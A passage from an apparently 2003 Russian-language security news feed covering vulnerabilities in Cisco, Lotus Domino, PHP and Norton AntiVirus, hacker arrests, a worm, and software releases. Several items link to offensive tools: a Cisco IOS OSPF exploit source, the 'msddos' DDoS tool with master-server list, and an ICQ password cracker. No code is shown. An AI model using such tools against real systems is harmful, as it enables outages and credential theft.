Как сообщается на сайте www.lrn.ru, украинская OSL SIG распространила систематизированные и новые материалы касательно законопроекта об использовании Свободного ПО в государственной сфере. Материалы в основном на украинском, c readme.pdf и некоторыми "внешними" дополнениями на русском. Подробности - http://osdn.org.ua/legal/
23/02/2003 09:38 Epiphany - новый проект по созданию "облегченной" версии Mozilla.
Проект Epiphany отделился от Galeon, и поддерживается одним и тем же человеком, Марко Песенти Гритти (Marco Pesenti Gritti). Проект имеет своей целью создание максимально простой и быстрой версии Mozilla. С теми же намерениями создавался и Galeon, однако "он начал идти по тому же плохому пути, что и Mozilla". Неудивительно, что г-н Гритти решил оставить Galeon и создать новый проект. Аналитики не пророчат новинке блестящего будущего, но считают, что она все же будет иметь определенный успех. Сайт проекта - http://epiphany.mozdev.org/
23/02/2003 09:14 С Днём Защитника Отечества!
Команда UINC Поздравляет всех причастных и сочувствующих с Днём Защитника Отечества! Со своей стороны хотелось бы пожелать, чтобы те, от кого это зависит, сделали это самое Отечество ОТЕЧЕСТВОМ! Источник - МЫ
23/02/2003 00:28 Personal firewalls vs Leak Tests.
Отличный документ, сравнивающий различные программы для проверки вашего брандмауера(фаерволла). Обсуждаются принципы работы каждого тестера, также приведены таблицы сравнивающие функциональность этих тестеров и защищенность самых популярных фаерволлов. Ознакомиться: http://www.pcflank.com/art21.htm
22/02/2003 17:46 Уязвимости в продуктах CISCO.
CISCO выпустила бююлетень по безопасности, в котором описывается наличие уязвимости в некоторых продуктах CISCO. В частности, в следующих: Cisco IP Phone Model 7940/7960, маршрутизаторах с запущенной версией ОС Cisco IOS 12.2T и 12.2 'X', Cisco PIX Firewall с поддержкой SIP. Уязвимость была обнаружена в реализации SIP (Session Initiation Protocol - протокол инициализации сессии), стандарте, стандартизированном IETF для организации мультимедиуных конференций через протокол IP. SIP является основанным на ASCII протоколом управления, соответствующим сетевому уровню приложений, определённым в RFC 2543 и 3261. Природа уязвимости заключается в некорректной обработке неверных сообщений типа INVITE (в частности, при его фрагментации). В результате посылки специально сформированного пакета можно завесить железку CISCO, при этом возобновление функциональности возможно только физической перезагрузкой. Выпущено обновление соответствующего софта. Также в бюллетене указывается, что уязвимость была обнаружена в результате тестирования ПО при помощи тестового пакета "PROTOS", выпускаемого и поддерживаемого University of Oulu Secure Programming Group (OUSPG). Подробности - http://www.cisco.com/warp/public/707/cisco-sa-20030221-protos.shtml
22/02/2003 16:58 В Туле задержаны двое хакеров.
В Туле правоохранительные органы задержали двух хакеров. На их совести 47 взломов компьютерных сетей и 27 пострадавших абонентов сети "Тулателеком". Обвиняемые - это 26-летний Илья Николаев и 23-летний Дмитрий Суханов. По словам старшего следователя следственного управления при Центральном РОВД Тулы Ирины Романовой хакеры " взламывали базу данных "Тулателекома", узнавали пароли и логины других абонентов и за их счет пользовались Интернетом". Николаев и Романов свою вину отрицать не пытаются. В ближайшее время должен пройти суд над хакерами. Согласно статье 272 УК РФ (неправомерный доступ к компьютерной информации) каждому грозит штраф размером до 15 тыс. рублей или лишение свободы сроком до 2 лет. Источник - http://www.viruslist.ru
22/02/2003 16:34 Компьютерное пиратство: Украине объявлен ультиматум.
Международный Альянс Защиты Интеллектуальной Собственности настаивает на дальнейших санкциях, направленных против Украины и в 2003 году. Альянс также рекомендует правительству Соединенных Штатов продолжать политику приостановки беспошлинной торговли Украины в рамках Общей Системы Преференций. Эти меры были введены против Украины в августе 2001 в связи с неблагоприятным положением дел в области Защиты Интеллектуальной собственности. Альянс объясняет свои рекомендации тем, что проблема пиратства в Украине остается очень серьезной даже спустя почти три года после принятия Плана Совместных Мероприятий, подписанного тогдашним президентом США Клинтоном и Президентом Украины Кучмой. Украина не выполнила взятых на себя обязательств в рамках Плана. Не выполняются Украиной также и Двусторонние Торговые Соглашения с США, принятые в 1992 г. и в июне 2000 г. Законодательство Украины об авторском праве и механизм привлечения к ответственности за его нарушение не в полной мере отвечают установленным нормам Всемирной Торговой Организации. Украина не должна быть допущена к вступлению во ВТО. Источник - http://www.crime-research.org/
22/02/2003 16:00 В Украине изменения в УК.
30 января 2003 г. в Украине был принят новый законопроект под названием "О внесении изменений в Криминальный и Криминально-процессуальный кодексы Украины (относительно отвественности за преступления в области использования компьютеров)". Особено вдохновляет ст 361-1: "Изготовление с целью сбыта, сбыт программных или технических устройств, предназначенных для незаконного проникновения в электронно-вычислительные машины (компьютеры), их системы и компьютерные сети" Как обычно, доказать умысел ("с целью сбыта") и назначение ("для незаконного проникновения") будет непросто. К законопроекту выпущена также пояснительная записка, сравнительная таблица и "довiдка" - судя по всему - на украинском языке. Что особо примечательно, что все эти документы выложены в формате документов WORD. Введена довольно любопытная статья 362 "Незаконное тиражирования и сбыт электронных баз данных, которые содержат персональные данные". Кстати, срок за это деяние предусмотрен до 2-х лет (если группой - то от 2-х до 5). Подробности - http://gipi.internews.ua/ukr/base/personal/criminal_code_additions_law.doc
22/02/2003 15:21 Выход Trustix Secure Linux 2.0 Techology Preview 2.
18 февраля на сайте trustix.org один из группы разработчиков Erlend Midttun сообщил о предварительном выпуске новой версии защищённого дистрибутива Linux - Trustix Secure Linux 2.0 Techology Preview 2 (Forecast). Как указывается, это только предварительный релиз (что видно из названия), основное назначение которого - представить пользователям возможность TSL 2.0, однако эту версию пока не рекомендуют устанавливать на продуктивных (стабильных) системах. Подробности - http://www.trustix.org/pipermail/tsl-announce/2003-February/000142.html
22/02/2003 14:47 Исследование выявило высокое качество кода open- source.
Консалтинговая группа, изучающая исходный код операционных систем, установила, что качество основных сетевых компонентов Linux во многих случаях выше, чем у конкурирующего закрытого ПО. Компания Reasoning, которая реализует услуги автоматического контроля ПО, изучила часть кода Linux и пяти других операционных систем, сравнивая количество и уровень ошибок программирования. В частности, Reasoning проверяла ключевую сетевую технологию TCP/IP и обнаружила в ее Linux-реализации меньше ошибок. «Реализация TCP/IP в ядре Linux отчетливо демонстрирует более высокое качество кода по сравнению с коммерческими операционными системами общего назначения», — говорится в отчете, опубликованном на прошлой неделе. Reasoning анализировала также код двух специализированных сетевых продуктов и установила, что Linux лучше одного из них. Уровень дефектов в Linux составил 0,1 на 1000 строк кода. Для операционных систем общего назначения этот показатель колеблется между 0,6 и 0,7 на 1000 строк кода, а у двух встроенных операционных систем он составил 0,1 и 0,3 на 1000 строк кода. Выводы Reasoning подтверждают точку зрения сторонников open-source, таких как Эрик Реймонд (Eric Raymond), которые утверждают, что проблемы решаются быстрее, когда код может изучать больше людей. Их аргумент: «Если глаз достаточно, то не страшны никакие баги». Reasoning отказалась назвать операционные системы, с которыми она сравнивала Linux, но сказала, что две из трех ОС общего назначения — это версии Unix. Сравнение проводилось с версией ядра Linux 2.4.19. Для сравнения продуктов компания имеет доступ к исходному коду проприетарного ПО, который обычно бывает засекречен. В число наиболее популярных версий Unix входят Solaris от Sun Microsystems, IBM AIX и Hewlett-Packard HP-UX. Они конкурируют с дистрибутивами Linux таких компаний, как Red Hat и SuSE, а также с Microsoft Windows. Подробности - http://news.com.com/2100-1001-985221.html?tag=fd_top
22/02/2003 14:18 Microsoft OneNote берет новую ноту.
Разработчики и корпоративные заказчики получили возможность бросить первый взгляд на два новых приложения Office 2003, которые Microsoft случайно выложила на свой веб-сайт — а потом быстро убрала. В среду днем Microsoft нечаянно опубликовала на своем веб-сайте Microsoft Developer Network (MSDN) новую тестовую версию Office 2003 Professional, а также новые программы OneNote и InfoPath, но уже через шесть часов убрала их после запроса от CNET News.com. Благодаря этой случайной публикации удалось предварительно ознакомиться с Office 2003 Beta 2, которая должна выйти в марте. Первую бета-версию Office 2003 Microsoft разослала примерно 12 тысячам бета-тестеров в октябре прошлого года — тогда продукт назывался Office 11. Однако копии программы OneNote, которая аналогична текстовому процессору, но предназначена для быстрой записи коротких заметок, получили лишь немногие. Потенциально публикация в среду значительно расширила круг ознакомившихся с продуктом за пределами Microsoft. Подробнее - http://www.zdnet.ru/?ID=296500
21/02/2003 20:05 А знаете ли вы откуда взялся термин "баг"?
Термин "bug" (жучок), обозначающий сбой системы, был введён в обиход в 1943 году. Случилось это в Америке, когда в компьютере Mark-II, использовавшемся ВМС США для баллистических расчётов, залетел мотылёк. Бедное насекомое ценой собственной жизни вывело из строя вычислительную систему и тем самым вошло в историю. Источник - http://www.kp.ru
21/02/2003 14:54 Антивоенные активисты обещают завалить Белый дом спамом.
Коалиция "Победа без войны" (Win Without War), объединившая несколько десятков общественных организаций, выступающих против войны в Ираке, объявила о подготовке новой акции протеста. Она будет заключаться в отправке множества факсов, электронных писем и звонков по телефону в американские правительственные органы, включая Сенат и администрацию президента Буша. В ходе "виртуальной демонстрации" в кабинетах американских чиновников должны будут ежеминутно звонить телефоны, приходить факсы и электронные письма с протестами против вторжения в Ирак. В настоящее время реклама акции с участием актера Мартина Шина запущена на многих крупных телеканалах, включая CNN. В рекламе актер призывает американцев еще раз выразить свой протест против войны. Желающие принять участие в акции должны обратиться в штаб "Победы без войны", где им дадут четкие инструкции относительно того, кому и когда им нужно звонить, отсылать факсы и письма. Зарегистрироваться для участия в акции, намеченной на 26 февраля, можно и через интернет. В состав антивоенной коалиции вошли многие авторитетные организации: Национальный совет церквей США, Национальная организация женщин США и многие другие. Подробности - http://www.ap.org/
21/02/2003 14:03 ФБР занялось делом хакера, укравшего номера 8 миллионов кредиток.
За расследование деятельности хакера, укравшего более 8 миллионов номеров кредитных карточек, взялось ФБР, сообщает Reuters. Недавно компания Data Processors International, обслуживающая трансакции по карточкам Visa, MasterCard, American Express и Discover Financial Services, сообщила, что недавно в ее систему "было осуществлено вторжение извне". Представитель MasterCard заявил, что всего в распоряжение злоумышленников могло попасть более 8 миллионов номеров кредитных карточек. Пока что не обнаружено никаких свидетельств того, что похищенные номер были как-либо использованы. Представитель ФБР Пол Брессон (Paul Bresson) сообщил, что бюро в курсе происшедшего и занимается расследование. Эксперты указывают, что главными потерпевшими в данном случае являются не владельцы карточек, так как в э их отношении уже введена в действие "политика нулевой ответственности", но банки, пускающие их в обращение. Замена одной карточки обойдется им в 4-5 долларов и общая сумма потерь может составить от 32 до 40 миллионов. Подробности - http://story.news.yahoo.com/news?...
21/02/2003 11:38 Возможность проведения DDoS с использованием игровых серверов.
Исследователь компьютерной безопасности Auriemma Luigi из PivX Solutions, LLC сообщает о возможности проведения атаки типа DDoS (распределённый отказ в обслуживании) с использованием технологии, применяемой игровыми серверами для посылки клиенту списка игровых серверов, активных на настоящий момент. Дело в том, что пакет со списком серверов посылается через UDP-протокол (который не требует организации канала связи). Подобные списки активных игровых серверов ведутся в виде базы на так называемых Мастер-игровых серверах. Таким образом, формируя ложные пакеты от имени жертвы, можно полность забить канал связи жертвы с Интернет (естественно, это зависит от "толщины" самого канала). Автором выпущен инструмент для реализации DDoS под названием msddos, а также прриведён список мастер-серверов Подробности - http://www.pivx.com/luigi/ Инструментик - http://www.pivx.com/luigi/poc/msddos.zip
21/02/2003 11:06 Обнаружена возможность взлома SSL.
Наиболее известная система шифрования, применяемая для шифрования траффика через Интернет SSL (Secure Sockets Layer), по сообщению BBC, была взломана исследователями одного из университетов Швейцарии. Команда исследователей Института Технологии Лозаныы сообщила, что она обнаружила технологию, позволяющую в течении часа дешифрировать парли, зашифрованные с использованием технологии SSL. Профессор Serge Vaudenay, руководитель лаборатории по исследованию безопасности и криптографии, в интервью BBC сообщил, что была обнаружена уязвимость в реализации SSL, однако не стал раскрывать подробности её. Тем не менее, исследователи утверждают, что транзакции с использованием кредитных карт, применяемые банками и сайтами электронной коммерции используют другой тип технологии SSL и поэтому не подвержены уязвимости. Подробности - http://news.bbc.co.uk/2/hi/technology/2785145.stm
21/02/2003 10:35 Эксплоит для CISCO IOS.
Некто FX из Германии опубликовал исходник эксплоита, использующего уязвимость в протоколе маршрутизации OSPF, включённого в IOS (операционная система в маршрутизаторах/файрволлах CISCO). Уязвимость имеет код ID CSCdp58462 на сервере корпорации CISCO. Патч давно выпущен. Ссылка приведена на сервер ЗАРАЗы. Исходник - http://www.security.nnov.ru/files/OoopSPF.c
21/02/2003 09:48 Выход ike-scan v1.1.
Roy Hills сообщает о выходе новой версии сканера сетей с протоколом IPsec - v.1.1. В новую версию добавлены следующие дополнения/улучшения: добавлены новые шаблоны для определния типа систем, на которых запущен IPsec; добавлена поддержка компиляции на других ссистемах, включая Win32 с Cygwin, добавлен бинарник для Win32 с поддержкой Cygwin DLL; добавлена идентификация Checkpoint Firewall-1 4.1 и NG Base. Автор ждёт от тестеров сообщения об ошибках. Скачать - http://www.nta-monitor.com/ike-scan/
21/02/2003 09:09 Бюллетень по безопасности CERT.
Ранее мы сообщали об обнаружении Дэвидом Литчфилдом из Next Generation Security Software Ltd. множественных уязвимостей в СУБД Oracle. 19 февраля координационный центр CERT (базируется в университете Карнеги-Меллона, Питтсбург, США) выпустил бюллетень по безопасности с кодом CA-2003-05, в котором детально описываются обнаруженные уязвимости, а также приведены ссылки на патчи от Oracle Corporation. В качестве временных мер предосторожности до обновления СУБД рекомендуется: запретить ненужные сервисы в Oracle, запускать сервер Oracle с пониженными привилегиями, ограничить доступ из сети к серверу Oracle. Подробности - http://www.cert.org/advisories/CA-2003-04.html
20/02/2003 23:31 Новая программа: Miranda ICQ Password Decryptor/Cracker v1.0
Простенькая программа предназначенная для расшифровки забытого пароля популярного ICQ клиента - Miranda. Скачать можно здесь: http://www.uinc.ru/scripts/load.cgi?files/neox/MPD.zip
20/02/2003 22:16 Новая статья на сайте: Внутренний формат документов MS WORD.
Рассматриваются малоизвестные подробности внутреннего строения файлов MS Office: низкоуровневая организация структурированных хранилищ (structured storages), методы доступа к их содержимому. Также приводится краткое описание общей структуры документов MS WinWord различных версий. Приведенная информация может быть использована для самостоятельной генерации WinWord-документов, для восстановления информации из поврежденных DOC-файлов, для написания собственных антивирусов и т.п. Ознакомиться: http://www.uinc.ru/articles/39/index.shtml
20/02/2003 12:07 Intel выпустила новую программную библиотеку.
Новая версия библиотеки Intel Integrated Performance Primitives (Intel IPP), выпущенная корпорацией Intel, поможет разработчикам программного обеспечения создавать приложения для настольных ПК, серверов, мобильных и карманных устройств на базе процессоров Intel. Библиотека Intel IPP включает в себя набор высокопроизводительных программных функций и общий интерфейс прикладного программирования (API) и позволяет повысить производительность приложений и улучшить их совместимость с различными платформами на базе процессоров Intel. Программные библиотеки позволяют разработчикам без лишних усилий встраивать в свои приложения различные функции - обработку звука, видео, изображений, сигналов и речи. Благодаря использованию в библиотеке Intel IPP общего для всех архитектур интерфейса прикладного программирования созданные на ее основе функции будут работать на платформах на базе различных процессоров Intel без какого-либо изменения исходного кода. Это сокращает сроки и стоимость разработки и обеспечивает отличную производительность приложений на всех платформах. Компоненты библиотеки содержат базовые функции для обработки мультимедийных и числовых данных. Для ускорения разработки приложений библиотека Intel IPP включает около 30 примеров готового программного кода для различных программных функций, включая обработку речи, изображений, звука, видео и числовых данных. В библиотеку также включены математические функции для работы с небольшими матрицами и векторами, оптимизированные для новейших процессоров Intel. Библиотека Intel IPP 3.0 оптимизирована для процессоров Intel Pentium 4, Intel Xeon, Intel Itanium 2 и процессоров на базе технологии Intel XScale, включая прикладные процессоры Intel PXA250 и Intel PXA262. Библиотека поддерживает операционные системы Microsoft Windows XP, 98, 2000, ME, CE и PocketPC, а также различные версии ОС Linux. Подробности - http://www.intel.com/software/products
20/02/2003 11:49 Выход OpenSSL 0.9.7a и 0.9.6i.
Richard Levitte от имени команды разработчиков OpenSSL анонсировал выход новых версий этого продукта - 0.9.7а и 0.9.6i. OpenSSL - тулкит для реализации защищённых протоколов связи через Интернет SSL/TLS, поставляемый в исходных кодах. В новых версиях включены следующие дополнения/улучшения: устранены уязвимости в безопасности, улучшена поддержка MIT Kerberos, улучшена поддержка ассемблерного кода для IA32, включена поддержка новых платформ - FreeBSD/IA64 и FreeBSD/Sparc64, улучшена работа с цепочкой сертификатов и др. Относительно багофиксов в части безопасности, как указывает Jonas Eriksson, уязвимость в файле ssl3_get_record (ssl/s3_pkt.c) позволяла по разнице в задержке ответа можно различить неправильный MAC-адрес или неправильное дополнение (padding)(CAN-2003-0078). Новые версии - http://www.openssl.org/source/
20/02/2003 11:12 Уязвимость в NAV 2002.
Как сообщает ARAI из японской Secure Net Service(SNS), им обнаружена уязвимость в популярном антивирусном пакете Symantec Norton AntiVirus 2002. Связана с функцией сканирования почтовых сообщений. При посылке заархивированного файла, содержащего файл с очень длинным именем, происходит переполнение буфера NAV. Удалённый атакующий может использовать эту уязвимость для выполнения произвольного кода от имени подключённого к системе пользователя. Обнаружена в версии 8.07.17C в ОС Win 2K Professional Japanese Edition c SP3. Подробности - http://www.lac.co.jp/security/english/snsadv_e/61_e.html
20/02/2003 10:05 Арестована группировка румынских интернет-мошенников.
В очередной раз интернет-мошенники потерпели неудачу. На этот раз в руки полиции попались злоумышленники румынского происхождения. Действовала преступная группа в Скандинавии. Банда была задержана совместными усилиями правоохранительных органов США, Швеции и Румынии. Около года назад румынские граждане были уличены в том, что промышляли торговлей через интернет различной техники - калькуляторов, мониторов, видеокамер и прочей аппаратуры. Мошенники проникли на сайты электронных магазинов и 'продавали' там эту продукцию с предоплатой. Однако торговля эта была фиктивной - доверчивые покупатели, позарившись на дешевизну, в итоге оставались и без денег и без покупок. В итоге, находчивые злоумышленники заработали несколько сотен тысяч долларов. Для конспирации мошенники постоянно меняли банковские счета и названия своих 'торговых фирм'. Среди жертв преступников больше всего граждан США, которые, собственно, и пожаловались сотрудникам ФБР на обманувшие их магазины. Главный интернет-мошенник, а также его восемь сообщников, были задержаны при попытке получить перевод от очередного покупателя на сумму в $40 тыс. В данный момент полиция разыскивает ещё 15 человек. Источник - http://www.compulenta.ru
20/02/2003 09:39 Интернет-червь Tanger распространяется через популярные приложения обмена файлами.
В сети обнаружен новый интернет-червь Tanger, который распространяется при помощи электронной почты, mIRC, Pirch и Virc, а также посредством наиболее популярных программ обмена файлами - Kazaa, BearShare, Edonkey и Morpheus. Данная вредоносная программа использует для своего распространения наиболее популярные приложения обмена файлами. Червь ищет в общих папках таких программ, как Kazaa или Morpheus, файлы со следующими расширениями: scr, pif, mp3, mp2, gif, bmp, dib, png, jpg, jpeg, jpe, tif, tiff, mpg, mpeg, mpe, avi, mov, tmp, txt, lnk, bat, mdb, ppt и pps. При обнаружении указанных файлов он заменяет их своей копией. Вирус заражает документы Excel, общие шаблоны Word и файлы Access. I-Worm.Tanger проверяет, не установлены ли на пораженном компьютере приложения IRC mIRC, Pirch и Virc. При обнаружении таковых червь изменяет файлы script.ini и events.ini для получения возможности отправки файла Notice.tng с использованием команды /DCC. Источник - http://www.webplanet.ru
20/02/2003 09:15 Легендарной "Альтависте" пришёл конец.
Компания Overture Services объявила о приобретении известного поискового сайта Altavista. Сумма сделки составит 140 млн. долл. США, 80 млн. из которых Overture выплатит компании CMGI собственными акциями, а остальные 60 млн. долл. - наличными. Завершить сделку планируется в апреле нынешнего года. В свое время CMGI выкупила 83-процентную долю в Altavista у компании Compaq за 2,3 млрд. долларов. Компания Overture специализируется на размещении рекламы в поисковых результатах. Overture планирует использовать Altavista в качестве платформы для тестирования новых типов поисковых услуг и технологий размещения рекламы в результатах поиска. Вместе с этим, Overture будет работать над включением технологий Altavista в собственные продукты. Технологии, имеющиеся в распоряжении Altavista, достаточно совершенны, но несмотря на это, Altavista серьезно уступает конкурентам, и прежде всего, Google. У Altavista насчитываются 58 патентов, затрагивающих самые разные аспекта поиска информации в Сети. В России технологии Altavista продвигает компания РБК. Источник - http://www.compulenta.ru
20/02/2003 08:51 Phoenix Technologies добавляет новый уровень защиты информации.
Phoenix Technologies, один из лидеров в создании BIOS двух последних десятилетий, расширяет свой бизнес, планируя создать уровень безопасности приложений между BIOS и операционной системой для ПК, серверов и мобильных устройств. Известная как Phoenix Core Managed Environment, или cME, новая технология разработана для встраивания в защищенную область на компьютерных жестких дисках. Об этом рассказали официальные представители компании. Расположенные в этих защищенных от неумелого обращения областях, сМЕ-сертифицированные приложения смогут обеспечить антивирусную защиту, безопасность, диагностику, резервное копирование и интернет-доступ. Эти приложения, поскольку они не являются частью ОС, не будут подвергаться авариям системы и могут быть использованы для восстановления ПК в случаях аварий системы. При включении своего компьютера перед загрузкой ОС пользователи получат доступ через API к приложениям внутри сМЕ, и лишь после идентификации пользователя начнется загрузка самой ОС. По мнению специалистов, подобная технология будет особенно полезна для пользователей мобильных устройств, например, ноутбуков. В случае кражи или потери портативного ПК имеющаяся в нем информация также становится утерянной и уязвимой. Приложения сМЕ добавляют теперь новый уровень защиты. Технология позволяет записывать в защищенной области другие приложения от независимых поставщиков ПО, сертифицированных Phoenix. Кроме того, компания предоставит разработчикам набор инструментов для облегчения процесса написания ПО для среды сМЕ третьим лицам. Источник - http://www.cnews.ru
19/02/2003 15:19 RIAA выпустила руководство по борьбе с пиратами.
Как сообщается на сайте slashzone.ru, Ассоциация звукозаписывающих компаний Америки (RIAA) совместно с Американской ассоциацией кинокомпаний (MPAA) выпустили специальную брошюру, в которой на шести страницах описываются меры для пресечения незаконного копирования аудио и видеофайлов из всемирной сети. Брошюра распространена среди компаний, входящих в список Fortune 1000: руководству предлагается контролировать своих сотрудников и в случае обнаружения нарушителей применять жесткие карательные меры - вплоть до увольнения. В противном случае перед судом может предстать сама компания. Кроме того, в брошюре описываются и риски, с которыми связано незаконное скачивание музыкальных файлов - в частности, RIAA и MPAA упирают на вирусы и трояны. Что касается возможных санкций в отношении компаний-нарушителей, то здесь указываются уголовная ответственность, возмещение убытков, штрафы и так далее. В связи с этим руководству крупных организаций рекомендуется регулярно проверять компьютеры служащих на предмет наличия пиратских копий музыки или видео, а также клиентских программ для доступа в файлобменные сети. Подробности - http://story.news.yahoo.com/
19/02/2003 15:18 Dillo 0.70
После более чем полугода отсутствия обновлений вышла 0.70 версия маленького и быстрого браузера Dillo. Множество исправлений и нововведений в том числе:- добавлена поддержка ipv6
- исправлена утечка памяти в DwAlignedPage
- реализован <button> тег
- реализован ALIGN=CHAR
и многое другое Скачать - http://dillo.auriga.wearlab.de/download/dillo-0.7.0.tar.gz ChangeLog - http://dillo.auriga.wearlab.de/ChangeLog.html Русифицированная версия - http://stuphead.asplinux.ru/dillo/#toc6
19/02/2003 13:33 Во FreeBSD появилась JFS.
Проект JFS4BSD (Journaled File System for FreeBSD) объявил о доступности для тестировании в ветви FreeBSD-current журналируемой файловой системы JFS, доступной на настоящий момент в ОС AIX и LINUX. Доступна для скачивания с CVS-сервереа IBM. Качаем, тестируем. Источник - http://www.bsdforums.org/forums/showthread.php?threadid=6958
19/02/2003 12:43 Статья "Создание своего собственного CA".
На сервере ONLamp.com помещена статья, в которой автор подробно рассказывает, как создать свой собственный сертификат CA (Certificate Authority). Как известно, в Интернете существуют фирмы, занимающиеся подтверждением сертфикатов CA - в частности, этими операциями занимаются Thawte и VeriSign. Их бизнес состоит в подтверждении подлинности SSL-сертфикатов, которые используются сайтами при обмене критичной информацией (номера логинов и пароли). В статье как раз и рассказывается, каким образом можно при помощи OpenSSL генерировать собственный Certificate Authority. Процедура генерации выполняется при помощи небольшой утилиты CA.pl. Статья - http://www.onlamp.com/pub/a/onlamp/2003/02/06/linuxhacks.html
19/02/2003 12:11 Выход Crypto-Gram.
Bruce Schneier из Counterpane Internet Security, Inc. сообщает о выходе очередного, февральского номера электронного журнала Crypto-Gram. Журнал посвящён проблемам и анализу различных аспектов компьютерной безопасности и криптографии. Содержание: Locks and Full Disclosure, Crypto-Gram Reprints, Random Notes on the SQL Slammer, The Doghouse: Meganet, News, Counterpane News, Security Notes from All Over: Anti-Fraud Security at Banks, The Importance of Authentication, Comments from Readers. Рекомендуется для ознакомления специалистам, занимающимся компьютерной безопасностью, прикладной криптографией, да и просто заинтересованным людям. Доступен - http://www.counterpane.com/crypto-gram-0302.html
19/02/2003 11:44 Вышел "Электронный вестник "Лаборатории Касперского" #29.
"Лаборатория Касперского" представляет очередной номер электронного вестника "Касперский сообщает", рассказывающего о наиболее интересных вредоносных программах, обнаруженных в последнее время. Доступен по ссылке ниже в PDF-формате. Скачать - http://www.kaspersky.ru/go/030218.pdf
19/02/2003 11:25 Как заставить частный бизнес тратиться на IT-security.
Правительство Великобритании рассматривает пути форсированного освоения бизнесом стандарта безопасности BS7799 из-за опасений растущих угроз в области IT-security. Сумятица, вызванная такими "червями" как SQL Slammer, встревожила правительство наряду с озабоченностью, что IT-security недостаточно приоритетна в деловой практике. Slammer нанес ущерб в $1 млрд. по всему миру, несмотря на подготовленные за 8 месяцев до того "заплатки", Дэвид Хэндон (David Hendon), директор по информации и связи в Департаменте промышленности и торговли (DTI), предупредил, что пока бизнесмены не поймут значимость IT-security, стандарты по безопасности - такие как BS7799 - будут обязывающими. По сообщению vnunet, на Конференции по защите инфраструктур критической информации в Лондоне Хэндон заявил: "Наступает момент, когда общество не может позволить корпорациям вызвать катастрофы типа "телескопа" на скользкой дороге. И ответственность корпораций будет существенной". Упомянутый BS7799 определяет рамки требований для политики безопасности. Множество фирм, которые не осуществили аккредитацию, беспокоит правительство. В настоящий момент только 80 сертификатов вручено британским компаниям. Это, по словам Хэндону, удручающие цифры. Однако, он допускает, что его департамент вряд ли "пожертвует" деньги на цели "промоушен" аккредитации, пока это является обязательным. Подробности - http://www.crime-research.org/news/2003/02/1801.htm
19/02/2003 11:11 Семинар "Безопасность информационной системы современного предприятия".
Компания SoftLine сообщает о проведении бесплатного семинара "Безопасность информационной системы современного предприятия", который состоится 25 февраля 2003 г. по адресу: г.Москва, ул. Губкина, д. 8 Математический институт им. Стеклова. Семинар посвящен безопасности информационных систем в современном мире. Будет представлена стратегия Microsoft по обеспечению безопасности, рассмотрены возможности и функции системы защиты информации, реализованной в семействе операционных систем Microsoft Windows 2000. Особое внимание будет уделено новой концепции надежных информационных технологий Trustworthy Computing. Участники смогут также узнать о способах и схемах защиты корпоративной информации с помощью антивирусных продуктов компании Symantec. Начало регистрации - 9.30. Для участия обязательна регистрация на сервере Softline. Подробности - http://www.softline.ru/seminar.asp?...
19/02/2003 10:53 Множественные уязвимости в Lotus Domino.
Всё тот же Марк Литчфилд из NGSSoftware, не успев отстреляться в сторону Oracle, сообщает об обнаружении трёх уязвимостей в продукте IBM под названием Lotus Notes и Lotus Domino. Выпущены 3 бюллетеня по безопасности с кодами: #NISR17022003a, b, c. Первая уязвимость касается неверной обработке поля "Location" в заголовке сервера, заполняемого при формировании ответа 302 Redirect. Таким образом, удалённый злоумышленник, сформировав очень длинный заголовок клиента "Host" может получить полный контроль над сервером. Вторая уязвимость связана с возможностью удалённого переполнения буфера при большом значении опции s_ViewName/Foldername параметра PresetFields при формировании запроса к Вэб-ориентированому почтовому сервису. В итоге возникает возможность выполнения произвольного кода в кнтексте пользователя, от имени которого запущен сервер Domino. Третья уязвимость присутствует в Lotus iNotes-клиенте. Связана с возможность управления клиента при помощи ActiveX. При посылке очень длинного значения к методу "InitializeUsingNotesUserName" посредством E-mail или Вэб-страницы, удалённый сервер получает возможность выполнения произвольного кода на машине клиента в контексте пользователя, от имени которого был произведён доступ. Уязвимости обнаружены в версии Release 6.0. IBM выпущена новая версия Lotus Domino и Notes - 6.0.1, в которой указанные уязвимости устранены. Подробности - http://www.ngssoftware.com/
19/02/2003 09:17 Уязвимость в PHP.
PHP Group выпущен бюллетень по безопасности, в которой описывается наличие уязвимости в PHP версии 4.3.0. Обнаружена в компоненте CGI SAPI. Для предотвращения прямого доступа к CGI-бинарникам PHP рекомендуется собирать с опцией конфигурирования "--enable-force-cgi-redirect" и выставкой опции "cgi.force_redirect" в файле php.ini. Однако было обнаружено, что в версии 4.3.0 эта опция не работает. Это может позволить пользователю, вэб-сайт которого хостится на Вэб-сервере и имеющему доступ к CGI-модулям, получить доступ на чтение к любому файлу, доступному пользователю, от имени которого запущен Вэб-сервер. Также удалённый пользователь может заставить PHP выполнить произвольный PHP-сценарий, если атакующий способен внедрить код в файлы, к которым получает доступ CGI. К подобным файлам, например, относятся логи доступа. Выпущена новая версия PHP 4.3.1, в которой этой уязвимости нет. Также отмечено, что другие SAPI-модули (такие, как Апач или ISAPI) не подвержены уязвимости. Также отмечено, что достаточно простого обновления используемого CGI-модуля из состава пакета PHP 4.3.1. PHP 4.3.1 доступен - http://www.php.net/downloads.php
18/02/2003 21:17 Развертывание сети VPN
Статья под таким названием опубликована в январском номере журнала LAN. Сама по себе тема не нова, но автор описывает оригинальный подход "вилочного" подключения шифраторов, что позволяет, во-первых, разворачивать сеть постепенно, во-вторых - в случае выхода шифраторов из строя быстро откатиться к оригинальной конфигурации без перекоммутации, в том числе и автоматически, с использованием протоколов динамической маршрутизации. Информация получена с сайта www.bugtraq.ru Статья - http://www.osp.ru/lan/2003/01/020.htm
18/02/2003 16:01 Opera отомстила Microsoft.
В норвежской компании Opera Software, известной одноимённым веб-браузером, нашли способ выразить своё отношение к методам конкурентной борьбы, которые практикует Microsoft. Вряд ли им удалось напугать Microsoft - слишком разные у компаний весовые категории, однако наделать шума и лишний раз привлечь к себе внимание публики у Opera получилось. Всё началось пару недель назад. Разработчики альтернативного браузера обнаружили, что сайт MSN, принадлежащий Microsoft, выглядит в последней версии Opera довольно странно. На страницах отображалось меньше информации, а кое-где появились непонятные белые пятна, которых при использовании Internet Explorer не было и в помине. Как и следовало ожидать, дело было вовсе не в ошибках в программе. Сервер MSN проверяет, какой браузер к нему обратился, и выдаёт разным браузерам разные страницы. Существуют, как минимум, три версии сайта для различных браузеров: Internet Explorer, Mozilla/Netscape и Opera 7. В таком поведении MSN в Opera Software усматривают откровенную дискриминацию. Ведь изменив параметр User Agent, сообщаемый браузером сайту с Opera на Oprah, они получили совершенно нормальную страницу, такую же как и в IE6. Протесты Opera Software не возымели действия. Тогда норвежцы пошли другим путём и выпустили специальную версию своего браузера. Он ничем не отличается от Opera 7.01 и все сайты за исключением MSN показывает 